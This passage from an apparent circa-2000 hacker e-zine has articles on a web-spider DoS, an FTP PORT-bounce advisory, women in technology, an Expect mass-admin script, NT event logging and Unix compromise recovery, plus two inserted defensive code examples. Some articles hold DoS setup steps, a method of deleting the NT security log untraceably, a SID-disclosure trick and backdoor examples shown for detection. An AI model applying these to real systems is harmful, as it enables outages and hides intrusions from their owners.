record that I am not gay.

-sodium


[Spider DoS]=============================================================[fejed]



Denial of Service Attack Against Remote HTTP Spidering/Mirroring Software.

Basically, spidering and mirroring programs request robots.txt to find out
what they may fetch, for example to set quotas for transferring files, like
only 2 files per hour or something like that.

To perform this Denial of Service attack, you will require one Unix based
operating system, e.g. OpenBSD, that runs an HTTP daemon which can follow
symbolic links. Once you have got your webserver up, you'll need to
symbolically link a device that outputs random data (for example, at the time
of writing this, I would use /dev/random or an alternative such as
/dev/prandom, /dev/urandom, /dev/srandom etc.) to robots.txt in the document
root path (the path on the filesystem that the httpd treats as / for requests),
which would be accessed as http://yourserver/robots.txt.

Now, there are a few ways to perform this attack, one being to submit your
host to a search engine, like Yahoo. When your site is spidered by Yahoo, the
computer that is spidering your site will ask for robots.txt. What happens
when they ask for robots.txt? The server that is spidering your computer will
receive random data until it is unable to handle the amount it has received,
due to its lack of endless resources. ;-)

The second way to perform an attack using the Unix based system set up above
would be to have access to a Unix based system at normal user level (not super
user) and use a tool such as wget to carry out the denial of service attack on
the computer that you are issuing the mirroring to be done from.

I'm sure there are a few other things you could do with this attack, so use
your mind and discover as I do.




[File Transfer Protocol Advisory]========================================[fejed]


In writing this advisory I'm assuming you are familiar with the protocol
itself a little bit. As standard, all FTP daemons are required to support
the "PORT" command. This function of the protocol is used to set up the
data transfer ports between the user and the server. The FTP protocol
includes support for files to be transferred to a third-party host, to a
terminal or printer that may not be able to make use of the file transfer
protocol directly.

So far I've explained how the PORT command is used properly to some effect.
If you wish to have a deeper insight into the File Transfer Protocol and
its syntax then please refer to RFC 959.

Now the problem arises where anyone has the ability to transfer files to a
third party host; you may think there is nothing wrong with this at all.
Yet you are wrong. Why? Well, easy: by issuing the PORT command I can send
files and directory listings to just about any remote server with a TCP
port open. If we transfer large amounts of data across high speed
networks numerous times simultaneously, we will be creating a Denial of
Service attack against any chosen host. I'm not going to include the
exact syntax in this article for all you script kiddies out there. There
are many possibilities out there that you could use in conjunction with this
attack to maximise its effect greatly; those I will not publish because it
most likely will go to misuse, even though anyone with half a clue about
how the file transfer protocol works would be able to easily see the
hazards possible.

I've thought of a fix so everyone doesn't have to engage in a flurry of
wasting money and time on clueless idiots that have degrees and what
not.. *shut up fejed*.

This fix should be included in the next update of the FTP RFC: users
connecting to the server side of the protocol should NOT be allowed to
issue the PORT command to direct the data transfer to ports that are
listed in /etc/services, or something similar, to avoid the potential
denial of service attack happening. If you can't implement this fix
effective immediately then I suggest removing anonymous login so that
your FTP daemon is not used in conjunction with others to create a
DDoS/DoS attack against other hosts.
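The fix proposed above, as an added example that is not from the advisory: a server-side check of the RFC 959 PORT argument that refuses data connections to any host other than the client and to ports below 1024, which is the rule RFC 2577 describes and is used here in place of the /etc/services list. The 192.0.2.x and 198.51.100.x addresses are assumed documentation-range values.

```c
#include <stdint.h>
#include <stdio.h>

/* Verdict on one PORT argument, checked against the control connection. */
enum port_verdict {
    PORT_OK = 0,
    PORT_SYNTAX = 1,        /* not h1,h2,h3,h4,p1,p2 with each value 0..255 */
    PORT_FOREIGN_HOST = 2,  /* address is not the client that sent the command */
    PORT_PRIVILEGED = 3     /* port below 1024, e.g. 25 (smtp) or 80 (http) */
};

/* Parse the RFC 959 PORT argument "h1,h2,h3,h4,p1,p2".  Returns 0 and fills
   addr (host-order IPv4) and port, or -1 on malformed input. */
int parse_port_arg(const char *arg, uint32_t *addr, uint16_t *port) {
    unsigned v[6];
    char trailing;
    int i;
    /* the %c only matches if junk follows the six numbers */
    if (sscanf(arg, "%u,%u,%u,%u,%u,%u%c",
               &v[0], &v[1], &v[2], &v[3], &v[4], &v[5], &trailing) != 6)
        return -1;
    for (i = 0; i < 6; i++) if (v[i] > 255) return -1;
    *addr = ((uint32_t)v[0] << 24) | (v[1] << 16) | (v[2] << 8) | v[3];
    *port = (uint16_t)((v[4] << 8) | v[5]);
    return 0;
}

/* Server-side policy (RFC 2577 section 3): the data connection may only go
   back to the client that issued PORT, and only to an unprivileged port, so
   the daemon cannot be used as a relay against a third host.  peer_addr is
   the control connection's peer in host order. */
enum port_verdict check_port_cmd(const char *arg, uint32_t peer_addr) {
    uint32_t addr;
    uint16_t port;
    if (parse_port_arg(arg, &addr, &port) != 0) return PORT_SYNTAX;
    if (addr != peer_addr) return PORT_FOREIGN_HOST;
    if (port < 1024) return PORT_PRIVILEGED;
    return PORT_OK;
}

int main(void) {
    /* constructed: the client on the control connection is 192.0.2.10 */
    const uint32_t peer = (192u << 24) | (0u << 16) | (2u << 8) | 10u;
    const char *cmds[] = { "192,0,2,10,4,1", "192,0,2,10,0,80",
                           "198,51,100,7,4,1", "192,0,2,10,4", "192,0,2,300,4,1" };
    for (int i = 0; i < 5; i++)
        printf("PORT %-18s -> verdict %d\n", cmds[i], check_port_cmd(cmds[i], peer));
    return 0;
}
```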


[Women in Technology]===================================================[Godess]

I recently read an article that I found quite disturbing. The article
stated that according to a study by a North American Woman's University,
females are being driven away from technology because they're intimidated
by the amount of "geeky" men in the industry. I don't know where they
based their facts from, but are women really that shallow?

Are women really willing to stop themselves short just because the people they
work with know more than they do? Perhaps it's because women are intimidated by
the lack of respect given to women in the industry, or could it be that they
don't feel capable of learning at the same capacity as men do regarding
technology? I believe that most women are afraid of learning technology because
it's a high paced, fast moving industry. I'll admit it's hard to keep up, but if
you keep focus in certain areas of technology (i.e. network security,
networking, etc...) it can be done. I'm not saying that today's growing
technology is not overwhelming, but isn't it exciting? Wouldn't it be
great to discover something totally untouched, then release it to the
world knowing you've made a difference by learning and manipulating
technology to benefit the rest of the community? Be it exploits or
patches or simple protocol manipulation and variations thereof,
any one of these things can affect the whole way certain technologies are
viewed and standardized.

I know for a fact that there ARE women in technology, very bright and
enlightened women. These women are making history, discovering new ways
to use technology to benefit the rest of us. Not only are they making
history and discoveries, but they're protecting our technology. People
say "Hackers" are criminals; they also say "Hackers" are without ethics,
without integrity, and without conscience. However, does it make sense for
a Hacker to be out to destroy the one thing that breathes life into
him/her? Technology. That's right, and women have to keep up. The day is
not far when we will see typical female professions being taken over by
technology. The time is already at hand. There's no longer a need for
telephone operators; most companies throughout corporate America run
computer automated phone systems. Soon there will be no need for
secretaries, nurses, bankers, etc.... It's all going ONLINE! You can't even
work at fast-food establishments without knowing at least something about
technology; all registers nowadays are computerized for
efficiency. Why can't women take advantage of this? Why are there not
more women in technology? Because they're scared. Not of "geeky" men, but
of themselves and their limitations. My sisters in the community and I are
doing all we can to make the industry a better place for
women; all they have to do is apply themselves.

The women involved in technology are not "geeks" nor are we anti-social; we're
no less beautiful than a waitress or secretary. We have lives outside of
our computers. The only difference between us and other women is the drive to
make a major difference in a world that's still new and being
discovered. Other women can do it too, and hopefully will take the
initiative someday.

**Mad Props and Greets go to**: `immortal, WWsBabe, mo||y, baybee, and
jennicide. Women who are not afraid.

/* Editor's Rant: Before you look at the above article and say, "Gosh, that's
lame, Legions posted a girly article", think about this. Think about all the
times you have wished to find a female in your industry, just so that you would
have something to talk about. I have personally had the pleasure of working
with Godess, and now know that women need every piece of encouragement they can
get. I would not have known the difference between a scene whore and a brilliant
woman if I had not listened to what she and a few others have said to me.
I will encourage more women to write for Keen Veracity, as we are a forum for
everyone.
*/



[Expecting Mass Commands]========================================[Digital Ebola]

Ah. About half a year ago, I started working for a new company that has
deployed a lot of Linux servers. At the time that I came into it, we had maybe
120 servers total, and now we are up to almost 900, constantly adding more.
My first task was to script something that would change the passwords on
everything in a hurry. I had a deadline (the next morning) and was frantic.
I had never heard of Tcl/Expect up until this point. It did not take me very
long to be turned on to it.

Expect is a small utility that allows interaction through scripting. There are
many utilities that require user interaction to run (telnet, ftp, ssh).
Expect allows you to "fill in the blanks" automatically, so that you may
be able to run your script and walk away.

Included with the Expect source are examples of various scripts. I found
"passmass" and it was the exact answer to my problem. I then took that script
and worked it over so that it would be friendly with RedHat. Since then, I have
been playing more with Expect and find it to be a very powerful tool, and
it always works in a pinch. This is how Admin came to be. I needed to not only
change passwords, but also do a lot of other things, with a lot of hosts.
I built this off my modified script, based off the original passmass. The
result is a solution that has saved countless hours of "server touches".

I now give this script to the public; may it be used for GOOD purposes.
I do realize that with a little modification, it could launch the Internet's
version of World War 3. (300 hosts, ping -f starting remotely, ahem.)

This will work with RedHat 6 and above. Anything else, and you will need to
modify it. Have fun, and read about Expect!

#!/usr/bin/expect --
# Mass Admin v1.0 by Digital Ebola <digi@legions.org>
# Based on the passmass script by Don Libes
#
# COMMENTS: I don't really know if there was an example like this or not; I
# was in a pinch to execute certain commands over a large number of hosts.
# I basically took the passmass script and expanded it. If there are any bugs
# in this, it's because I threw it together in a hurry. This is tested on
# Red Hat 6.1; anything else might not work, so you might have to learn a
# little bit of Expect :)
#
# To run: you can either do it at the command line as
#     expect admin host1 host2 host3
# or write a little script to do it for you if you have a lot of hosts.
# Options can be mixed in with the host names and apply to the hosts that
# follow them:
#     -user name  -prompt regexp  -program cmd  -timeout secs  -su 0|1
#     -rlogin  -slogin  -ssh  -telnet

exp_version -exit 5.0

if {$argc == 0} {
    send_user "usage: $argv0 host1 host2 host3 . . .\n"
    exit
}

# A control-C typed by the user aborts the whole run.
expect_before -i $user_spawn_id \003 exit

# Remember a host we could not handle and tell the user why.
proc badhost {host emsg} {
    global badhosts

    send_user "\r\n\007$host not modified - $emsg\n\n"
    lappend badhosts $host
}

# Read one line from the user and return it; with secret=1 the terminal
# echo is turned off so passwords do not show on the screen.
proc ask {question {secret 0}} {
    if {$secret} { stty -echo }
    send_user $question
    expect_user -re "(.*)\n"
    send_user "\n"
    if {$secret} { stty echo }
    return $expect_out(1,string)
}

# Set to 1 (here, or with "-su 1" on the command line) to su to root on each
# host before running the program.
set su 0

set login   [ask "Enter Login Method (rlogin, slogin, ssh or telnet): "]
set program [ask "Program to execute: "]
set user    [ask "user id: "]
set password(login) [ask "Login password: " 1]
if {$su} {
    set password(old) [ask "root password: " 1]
}

trap exit SIGINT

# If you have major problems, you might have to set the timeout differently.
set timeout 15

set badhosts {}
for {set i 0} {$i < $argc} {incr i} {
    set arg [lindex $argv $i]
    switch -- $arg {
        "-user"    { incr i; set user    [lindex $argv $i]; continue }
        "-prompt"  { incr i; set prompt  [lindex $argv $i]; continue }
        "-program" { incr i; set program [lindex $argv $i]; continue }
        "-timeout" { incr i; set timeout [lindex $argv $i]; continue }
        "-su"      { incr i; set su      [lindex $argv $i]; continue }
        "-rlogin"  { set login "rlogin"; continue }
        "-slogin"  { set login "slogin"; continue }
        "-ssh"     { set login "ssh";    continue }
        "-telnet"  { set login "telnet"; continue }
    }

    # "-su 1" may only show up after the prompts above have run, so ask for
    # the root password the first time it is actually needed.
    if {$su && ![info exists password(old)]} {
        set password(old) [ask "root password: " 1]
    }

    set host $arg
    switch -- $login {
        "rlogin" { set pid [spawn rlogin $host -l $user] }
        "slogin" { set pid [spawn slogin $host -l $user] }
        "ssh"    { set pid [spawn ssh $host -q -l $user] }
        default  {
            set pid [spawn telnet $host]
            expect -re "(login|Username):.*" { send "$user\r" }
        }
    }

    # Guess a shell prompt unless one was given with -prompt.
    if {![info exists prompt]} {
        if {[string equal $user "root"]} {
            set prompt "# "
        } else {
            set prompt "(%|\\\$|#) "
        }
    }

    set logged_in 0
    while {1} {
        expect "*assword*" {
            send "$password(login)\r"
        } eof {
            badhost $host "spawn failed"
            break
        } timeout {
            badhost $host "could not log in (or unrecognized prompt)"
            exec kill $pid
            expect eof
            break
        } -re "incorrect|invalid" {
            badhost $host "bad password or login"
            exec kill $pid
            expect eof
            break
        } -re $prompt {
            set logged_in 1
            break
        }
    }

    if {!$logged_in} {
        continue
    }

    if {$su} {
        send "su -\r"
        expect "Password:"
        send "$password(old)\r"
        expect "# "
        send "$program\r"
        expect "# "
        send "exit\r"          ;# drop out of the root shell again
    } else {
        send "$program\r"
    }

    # Wait for the user's prompt to come back, then log out so a session is
    # not left hanging around for every host in the list.
    expect -re $prompt
    send_user "\n"
    send "exit\r"
    expect eof
    wait
}

if {[llength $badhosts]} {
    send_user "\nfailed to execute command on $badhosts\n"
}




[NT Logging]============================================================[NtWak0]


+-----------------------------------------------------------------------------+
|Author : NtWaK0                                                              |
|Crew   : Legions Of the Underground                                          |
|Subject: NT LOGGING                                                          |
|Date   : Sep-3-2000                                                          |
+-----------------------------------------------------------------------------+

INTRODUCTION
============

Many people have asked me about NT and where THESE logs are, so here we go:
what I can think of about NT monitoring that will help NT admins and other
people too :)

First let us start with a brief description of NT logs.


NT LOGS DESCRIPTION
===================

There is no magic in NT logs like there is in UNIX logging. To manage your NT
logs you have to use "Event Viewer".

What is "Event Viewer"? Well, if you click Help in Event Viewer you will get
a nice description:
Event Viewer is the tool you can use to monitor events in your system. You
can use Event Viewer to view and manage System, Security, and Application
event logs. You can also archive event logs. The event-logging service
starts automatically when you run Windows NT.
You can stop event logging with the Services tool in Control Panel.

Let me comment on this last phrase from the MS help: "You can stop event
logging with the Services tool in Control Panel".
WELL, IT IS NOT TRUE: YOU CANNOT STOP THE EVENT LOG SERVICE WHILE NT IS
RUNNING. WHAT YOU CAN DO IS DISABLE IT, WHICH MEANS THAT THE NEXT TIME YOU
REBOOT THE EVENT LOG SERVICE WILL NOT BE STARTED.

So to sum up, you cannot STOP EVENTLOG from the GUI, you can only disable it,
and from the command line you will get this:
----------------------------------------------[NET STOP EVENTLOG DUMP]------
C:\>net stop EVENTLOG
The requested pause or stop is not valid for this service.

More help is available by typing NET HELPMSG 2191.

C:\>NET HELPMSG 2191
The requested pause or stop is not valid for this service.

EXPLANATION

This command is invalid for this service, or the service cannot accept the
command right now.

ACTION

If the service normally accepts this command, try typing it
again later.
----------------------------------------------------------------------------

LOGS TYPE
=========

The three types of NT event logs are:

System log
----------
Tracks miscellaneous system events, e.g. events during system startup and
hardware and controller failures.

Application log
---------------
Tracks application-related events; e.g. informational messages generated by
applications, such as failing to load a DLL, will appear in this log.

Security log
------------
Tracks events such as logon, logoff, changes to access rights, and system
startup and shutdown.
As you will see later in this paper, the security log is turned off by
default.


LOGS LOCATION AND ENABLING
==========================

The location of NT logs is :

%SYSTEMROOT%\system32\config\SysEvent.Evt
%SYSTEMROOT%\system32\config\SecEvent.Evt
%SYSTEMROOT%\system32\config\AppEvent.Evt

By default NT DOES NOT log all events. You have to enable auditing; to do so
follow these steps:


1- From the Start Menu, choose Programs and then Administrative Tools
(Common). From the Administrative Tools submenu, choose User Manager, which
displays the User Manager window.
2- From the User Manager menu click Policies, then click Audit; the Audit
Policy window appears.
3- Select the radio button "Audit These Events".
4- Select what you want, click OK and close User Manager :)

NOTE: If you decide to audit all events you had better HAVE SOME KICK ASS
MACHINE because this is going to suck a lot of resources.

Auditing of Privileges
======================
Certain privileges in the system are not audited by default even when
auditing on privilege use is turned on. This is done to control the growth
of audit logs. The privileges are:

1- Bypass traverse checking *** To Everyone ***
Is granted to everyone, so is meaningless from an auditing perspective

2- Debug programs *** To Administrators ***
Not used in a working system and can be removed from administrators group

3- Create a token object *** To NO One ***
Should not be granted to anyone

4- Replace process level token *** To NO One ***
Should not be granted to anyone

5- Generate Security Audits *** To NO One ***
Should not be granted to anyone

6- Backup files and directories *** To Administrators Backup Operators. ***
Used during normal system operations

7- Restore files and directories *** To Administrators Backup Operators. ***
Used during normal system operations


To enable auditing of these privileges, add the following value under the Lsa
key:

Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: \CurrentControlSet\Control\Lsa
Name: FullPrivilegeAuditing
Type: REG_BINARY
Value: 1

Or create a text file, call it audit.reg, and cut and paste the lines below:
-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"FullPrivilegeAuditing"=hex:01
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .reg file, either double-click on it, or open a command prompt
and type: REGEDIT /S audit.reg
This will merge the file you have created.


Auditing Base Objects
=====================
This registry value tells the Local Security Authority that base objects
should be created with a default system audit control list. The administrator
will still need to turn auditing on for the "Object Access" category using
User Manager.

To enable auditing of base objects, add the following value under the Lsa key:
Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: \CurrentControlSet\Control\Lsa
Name: AuditBaseObjects
Type: REG_DWORD
Value: 1

Or create a text file, call it auditObj.reg, and cut and paste the lines below:
-----------------------------------------------------------[SNIP HERE]------

REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa]
"AuditBaseObjects"=dword:00000001
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .reg file, either double-click on it, or open a command prompt
and type: REGEDIT /S auditObj.reg
This will merge the file you have created.

EXAMPLE
=======
What do you see when you enable security auditing?
IN THIS EXAMPLE I ENABLED ONLY LOGON/LOGOFF FAILURE AUDITING.

Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL


CLEARING NT LOGS
================
To clear a log, switch to the log you want to clear, and on the Log menu click
CLEAR ALL EVENTS. A message asks if you want to archive the current events.
If you answer Yes, the SAVE AS dialog box appears; enter the filename and
folder path where you want to store the saved log.
After you answer Yes or No, Event Viewer empties the current log.
Only new events will appear in the log.
NOTE: When you clear the SECURITY LOG, an event will SHOW in the Security log.

Even if you clear the log you still see this entry:

The audit log was cleared
Primary User Name: SYSTEM
Primary Domain: NT AUTHORITY
Primary Logon ID: (0x0,0x3E7)
Client User Name: WaKiNg
Client Domain: BRAINCELL
Client Logon ID: (0x0,0x2581)

This entry means you cleared the security event log.
Now if you want to clean the log you can do the following:

1- Open Control Panel and then Services
2- Locate the EVENTLOG service and click the STARTUP button
3- In Startup Type choose Manual or Disabled
4- Restart NT
5- Go to %SYSTEMROOT%\system32\config and delete SecEvent.Evt

By doing so the eventlog service will not be running, and you can then delete
the log you are interested in. :)



TOOLS TO MANAGE NT LOGS
=======================

I use Dumpel.exe from the NT Resource Kit; I am an old dude who loves the
command line :) If you like the command line I suggest Dumpel.exe; if not, see
the links below.

I also use NTLast from NTObjectives.
Here is the usage text Dumpel.exe prints:

DUMPEL Usage:
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t]
[-d x]

-d <days> Filters for event last days (number larger than zero)
-e nn Filters for event id nn (up to 10 may be specified)
-f <filename> Output filename (default stdout)
-l <name> Dumps the specified log (system, application, security)
-b Dumps a backup file (use -l to specify file name)
-m <name> Filters for events logged by name
-r Filters out events logged by name (must use -m too)
-s <servername> Remote to servername
-t Use tab to separate strings (default is space)
-c Use comma to separate fields
-ns Do not output strings
-format <fmt> Specify output format. Default format is
dtTCISucs
where
t - time
d - date
T - event type
C - event category
I - event ID
S - event source
u - user
c - computer
s - strings


NTLast v2.85
------------

http://www.ntobjectives.com/ntlastv2.htm

NTLast is specifically targeted at serious security and IIS administration.
Scheduled review of your NT event logs is critical for your network.
A server breach can be uncovered by regular system auditing.
Identifying and tracking who has gained access to your system, then
documenting the details, is now made easier with NTLast.

This tool is able to quickly report on the status of IIS users, as well as
filter out web server logons from console logons.


EventReader
-----------

http://www.strongsoftware.net/eventrd/

EventReader(TM) is an administrative tool which allows network
administrators to analyze and manage event logs. The program lets you
collect event logs from Windows NT computers in a network and store the
information in one or several ODBC compatible databases
(Microsoft SQL Server or Microsoft Access). You can designate the computers
from which to collect the information, and assign a schedule and data
collection and event log backup parameters. The installation package
includes a Microsoft Access sample database, which contains many queries
and reports for effective event log analysis.


Event Archiver Enterprise
-------------------------

http://www.eventarchiver.com/download.asp

Event Archiver Enterprise is one of the easiest to use products in the event
log management market, and stands above the others with its flexibility.
We think of it as a "set once, run forever" application that saves your
organization considerable time and money. Given the average hourly cost of a
Windows NT/2000 administrator, deploying Event Archiver Enterprise greatly
reduces your organization's TCO. After installing Event Archiver,
administrators can start analyzing event log entries instead of just trying
to save and store them regularly.


EventReporter Version 4.0
-------------------------

http://www.eventreporter.com/en/

Version 4.0 provides a number of important enhancements:
- Support for message delivery via email
- Client added: a graphical user interface for customizing EventReporter
- Filtering of events based on severity code (e.g. error, warning)
- Greatly enhanced documentation
- Greatly enhanced web site, especially the support area


Remote Viewers - Event Log Monitor
----------------------------------
http://www.tntsoftware.com/products/emon22/viewers.asp

The Remote Viewer for Windows PC runs on Microsoft Windows 95, Windows 98 and
Windows NT. It lets you search and display event log information as it is
received by the console, and receive user-selected real-time alerts from the
console, which are immediately displayed in the Remote Viewer.

Provides remote management for processes, services, and device drivers
Provides remote search, edit and creation of user-defined notes and message
references
Provides multiple remote command prompt windows


SECURITY ISSUE FOUND WHILE I WAS WRITING THIS PAPER, THE BUG WAS NOT OUT YET
============================================================================

To those of you who know about SIDs in NT and the tool "sid2user" that allows
you to get the SIDs of users:

Well, I found a way to get the SID, even the Administrator's, remotely if
certain conditions are met:

1- By default NT logs can be viewed remotely :)
2- If you have auditing enabled
3- If your policies block the account after a certain failure count.

Now here is what you need to do to get NT to spit out the SID
----------------------------------------------------------

Try to log in to the remote box using any existing account; you will get a
logon failure and in Event Viewer you will generate an entry:

Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL

If, like I said, you have a policy that blocks an account after a certain
count, you will see this entry in your log file:
User Account Locked Out:
Target Account Name: WaKiNg
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
Caller Machine Name: \\BRAINCELL
Caller User Name: SYSTEM
Caller Domain: NT AUTHORITY
Caller Logon ID: (0x0,0x3E7)

So now if you connect to the remote box using Event Viewer you will be able
to see the logs, and you will see the SID:
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500

I did not do any other research into this because the objective was not to
find something but to write this paper :)
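Here is what the defender's side of the same log looks like, as an added example that is not part of the article and not from the Resource Kit or NTObjectives: a small script that reads dumpel output and pulls out the three entries discussed above, failed logons grouped by workstation (the noise that precedes a lockout), lockouts together with the SID in them, and the "audit log was cleared" entry. It assumes dumpel's default field order dtTCISucs from the usage text above with tab-separated fields (-t). The sample lines are constructed from the event bodies printed in the article (the dates, times and machine names are made up), and the event IDs 529, 644 and 517 are the standard NT security event IDs for those three messages, which the article itself does not list. A SID whose last component is 500 belongs to the built-in Administrator account whatever it has been renamed to, so a lockout carrying such a SID means the admin account is the one being hammered.

```python
import re
from collections import Counter

# dumpel's default field order, "dtTCISucs" in its usage text:
# date, time, event type, category, event ID, source, user, computer, strings.
FIELDS = ("date", "time", "type", "category", "event_id",
          "source", "user", "computer", "strings")

# NT security event IDs for the three messages shown in the article
# (the article does not list them; these are the standard NT 4 / 2000 IDs).
EV_LOGON_FAILURE = 529
EV_ACCOUNT_LOCKOUT = 644
EV_LOG_CLEARED = 517

# Well-known relative identifier (last SID component) of the built-in
# Administrator account, whatever name it currently has.
ADMIN_RID = 500

SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")

# Constructed sample of "dumpel -l security -t" output, built from the event
# bodies printed in the article; dates, times and hosts are hypothetical.
_FAILURE = ("9/3/2000\t{t}\tFAILURE AUDIT\tLogon/Logoff\t529\tSecurity\t"
            "NT AUTHORITY\\SYSTEM\tBRAINCELL\tLogon Failure: Reason: Unknown user"
            " name or bad password User Name: WaKiNg Domain: WaK0 Logon Type: 3"
            " Logon Process: KSecDD Workstation Name: \\\\BRAINCELL")
SAMPLE_DUMP = "\n".join(
    [_FAILURE.format(t=t) for t in ("10:02:11", "10:02:19", "10:02:27")] + [
    "9/3/2000\t10:02:27\tSUCCESS AUDIT\tAccount Management\t644\tSecurity\t"
    "NT AUTHORITY\\SYSTEM\tBRAINCELL\tUser Account Locked Out:"
    " Target Account Name: WaKiNg"
    " Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500"
    " Caller Machine Name: \\\\BRAINCELL Caller User Name: SYSTEM",
    "9/3/2000\t10:15:03\tSUCCESS AUDIT\tSystem Event\t517\tSecurity\t"
    "NT AUTHORITY\\SYSTEM\tBRAINCELL\tThe audit log was cleared"
    " Primary User Name: SYSTEM Primary Domain: NT AUTHORITY"
    " Client User Name: WaKiNg Client Domain: BRAINCELL",
])


def parse_dumpel(text, sep="\t"):
    """Turn dumpel output into one dict per event (event_id as int or None)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # The strings field is last and may itself contain the separator.
        parts = line.split(sep, len(FIELDS) - 1)
        parts += [""] * (len(FIELDS) - len(parts))
        ev = dict(zip(FIELDS, parts))
        ev["event_id"] = int(ev["event_id"]) if ev["event_id"].isdigit() else None
        events.append(ev)
    return events


def _grab(label, text):
    """Return the token following 'label:' in an event's strings, or '?'."""
    m = re.search(re.escape(label) + r":\s*(\S+)", text)
    return m.group(1) if m else "?"


def triage(events, lockout_warn=3):
    """Pull out what a defender wants to see first in a security log dump."""
    report = {"log_cleared": [], "lockouts": [], "failed_logons": Counter(),
              "admin_targeted": False}
    for ev in events:
        text, eid = ev["strings"], ev["event_id"]
        if eid == EV_LOG_CLEARED or "audit log was cleared" in text:
            report["log_cleared"].append(
                {"time": f'{ev["date"]} {ev["time"]}',
                 "by": _grab("Client User Name", text)})
        elif eid == EV_ACCOUNT_LOCKOUT or "Account Locked Out" in text:
            sid = SID_RE.search(text)
            entry = {"account": _grab("Target Account Name", text),
                     "sid": sid.group(0) if sid else None}
            report["lockouts"].append(entry)
            if entry["sid"] and int(entry["sid"].rsplit("-", 1)[1]) == ADMIN_RID:
                report["admin_targeted"] = True
        elif eid == EV_LOGON_FAILURE or "Logon Failure" in text:
            report["failed_logons"][_grab("Workstation Name", text)] += 1
    # Workstations with enough failures to trip a lockout policy.
    report["noisy_workstations"] = [
        ws for ws, n in report["failed_logons"].items() if n >= lockout_warn]
    return report


if __name__ == "__main__":
    for key, value in triage(parse_dumpel(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

On a real host the same script is fed the output of `dumpel -l security -t` (or `-s \\server` for the remote case the article describes); the "log cleared" entry is the one to alert on, since it is the only trace a cleared security log leaves behind.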
===============================================================================
Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
-----------------------------------------------------------------
Live Well Do Good, Accept no limitations --:)
===============================================================================



[UNIX Autopsies]=================================================[Digital Ebola]


How to Perform an Autopsy (Oh God, I've Been Owned)
A Text for Admins in the Wonderful World Of Unix
--------------------------------------------------------------------------------

No matter how good you are, eventually it's going to happen. You are going to
get owned. Now, while this might not happen as often to a senior-level admin
who has been playing with UNIX for a long time, it will happen at some point.
This is mathematics. Someone is going to find a bug somewhere, or maybe you
just overlooked something. Nevertheless, it happened; stop crying like a baby
and plan your next action. It doesn't cost 80 thousand dollars to bring boxes
back from the molestations of a 14 year old, but it does take some effort. You
have essentially 3 options, which I will explain:

1. Reinstall. Time consuming, but very effective. Quicker than the other
methods.

2. De-own the box. A little more time consuming than a reinstall, but you save
your data.

3. Set up booby traps and wait.


OPTION #1

Reinstalling is such a pain. You have custom scripts to replace, custom
configurations for any of the services you may be running, and possibly even
custom software that has been written in-house. I cannot stress enough the
importance of a backup in any case. If you are not backing things up, you are
not doing your job. Period. Don't go blaming your loss on the hacker that got
you, because the same thing could have happened in the event of a hardware loss
or a Layer 1 disaster. If you were smart, restore from backups, fix the
original security hole, and you're on your way. If you were not smart, well,
you are going to spend some time reconfiguring, but this is still faster than
the next methods I am about to detail.

OPTION #2

De-owning the box is time consuming. No doubt about it. You will gain a lot of
information by doing this. What it takes is patience, and a lot of reading.
First of all, you need to assess the visible damage. Were there any web page
defacements? Was there a nasty issue.net? Are users complaining of data loss?
Are the logs still intact? Also, did the cracker leave behind a history file?
Some crackers are way sloppy; either they are too much of a novice to know, or
they just plain don't care. At any rate, this is information you have to
collect.

After your damage assessment is complete, you can then begin to fix your box.
Chances are great that your cracker has left several backdoors in the system.
The golden rule of thumb is: anything that runs as root can be a backdoor.
Some examples are /bin/login, /root/.bash_profile, or any of your startup
scripts such as /etc/rc.x or /etc/init.d, and so forth. If you know UNIX, you
will know what I am talking about. Another, simpler backdoor is a SUID shell
somewhere on the box. You check for all SUID programs by doing this:

owned$ find / -perm -4000 -print > suid

You are looking for anything out of the ordinary such as this:

-rwsr-sr-x 1 root root 426980 May 9 01:00 .bash

Now, why would there be a SUID program in someone's home directory that is
owned by root? When did root put that there? Chances are, root did not. The
kid that was playing around as root did. And in most cases, executing that
program as a standard user will produce a root shell. Granted, there have been
some improvements in some versions of shells that have better UID control, but
there are a lot of systems that will let you chmod +s sh and then run it as a
user. It runs as root. You become root.

Another even simpler backdoor can be found by simply checking your passwd file.
You would be surprised the number of admins that never watch their passwd file.
In this case you would be looking for:

digi:x:1000:1000:Digital Ebola,,,:/home/digi:/bin/bash
digi2:x:0:0:Digital Ebola,,,:/home/digi:/bin/bash

The cracker would then proceed to telnet into your machine as a normal user,
and then su to their root shell. I must say, I have personally seen a backdoor
like this last for up to 78 days.

Another form of backdooring is the rootkit. Crackers today are mostly
unoriginal people, whether from lack of skill or from impatience. This is a
good thing for you, the admin. Why? Their lack of creativity will allow you to
find their backdoors easily, due to the public archiving of these rootkits. You
should download every rootkit you can find, and do file compares between them
and the binaries of your flavor/distro. Common trojaned services are telnetd,
identd and even sshd. This takes time. Read the rootkit instructions, try the
default methods of accessing. Most people never even bother to customize a
pre-built rootkit. Another thing you can do, in certain cases, is checksum
compares. Vendors release checksums along with their packages for integrity
